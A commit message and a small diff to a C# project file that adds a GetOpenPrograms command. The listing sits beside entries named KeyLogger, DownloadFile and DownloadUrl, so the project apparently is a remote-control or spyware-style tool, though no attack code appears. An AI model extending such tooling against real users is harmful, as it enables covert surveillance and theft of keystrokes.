GetOpenPrograms & TableDisplay() made static
Moved TableDisplay() from SysInfo to Command manager as an internal static method

--- a/Commands/Commands.csproj
+++ b/Commands/Commands.csproj
@@ -55,6 +55,7 @@
     <Compile Include="DownloadFile.cs" />
     <Compile Include="DownloadUrl.cs" />
     <Compile Include="Exit.cs" />
+    <Compile Include="GetOpenPrograms.cs" />
     <Compile Include="ICommand.cs" />
     <Compile Include="KeyLogger.cs" />
     <Compile Include="Properties\AssemblyInfo.cs" />
